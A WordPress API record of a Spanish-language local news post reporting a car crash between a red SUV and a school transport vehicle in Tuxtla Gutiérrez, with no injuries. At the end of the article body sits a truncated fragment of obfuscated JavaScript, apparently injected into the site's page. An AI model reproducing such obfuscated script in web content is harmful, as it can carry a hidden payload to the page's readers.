{"id":15709,"date":"2024-05-21T02:13:41","date_gmt":"2024-05-21T02:13:41","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=15709"},"modified":"2024-05-21T02:13:41","modified_gmt":"2024-05-21T02:13:41","slug":"choque-en-la-avenida-central-de-tuxtla-deja-cuantiosos-danos-materiales","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=15709","title":{"rendered":"Choque en la Avenida Central de Tuxtla deja cuantiosos da\u00f1os materiales"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"15711\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1716257505021-1024x768.jpg\" alt=\"\" class=\"wp-image-15711\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1716257505021-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1716257505021-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1716257505021-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1716257505021.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"15710\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1716257509263-1024x768.jpg\" alt=\"\" class=\"wp-image-15710\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1716257509263-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1716257509263-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1716257509263-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1716257509263.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 20 de mayo del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este lunes por la ma\u00f1ana se registr\u00f3 un fuerte accidente de tr\u00e1nsito sobre la Avenida Central, a la altura de 7a Oriente, dejando cuantiosos da\u00f1os materiales.<\/p>\n\n\n\n<p>Los reportes de tr\u00e1nsito informaron que, este hecho ocurri\u00f3 cuando una camioneta Suv Toyota Avanza de color rojo circulaba de Oriente a Poniente cuando fue impactada por una unidad en la modalidad de transporte escolar de color rojo con n\u00famero econ\u00f3mico TE-162.<\/p>\n\n\n\n<p>Por el fuerte choque, las dos unidades salieron proyectadas y quedaron a media calle.<\/p>\n\n\n\n<p>A pesar de lo aparatoso del accidente no hubo heridos, pero s\u00ed graves da\u00f1os a las unidades.<\/p>\n\n\n\n<p>Al no haber un arreglo entre los conductores, debido a que, los dos argumentaban tener la raz\u00f3n, las unidades fueron consignadas ante las autoridades competentes para deslindar responsabilidades.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 20 de mayo del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este lunes por la ma\u00f1ana se registr\u00f3 un fuerte accidente de tr\u00e1nsito sobre la Avenida Central, a la altura de 7a Oriente, dejando cuantiosos da\u00f1os materiales. Los reportes de tr\u00e1nsito informaron que, este hecho ocurri\u00f3 cuando una camioneta Suv Toyota Avanza de color &hellip;<\/p>\n","protected":false},"author":2,"featured_media":15710,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-15709","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15709","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=15709"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15709\/revisions"}],"predecessor-version":[{"id":15712,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15709\/revisions\/15712"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/15710"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=15709"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=15709"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=15709"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}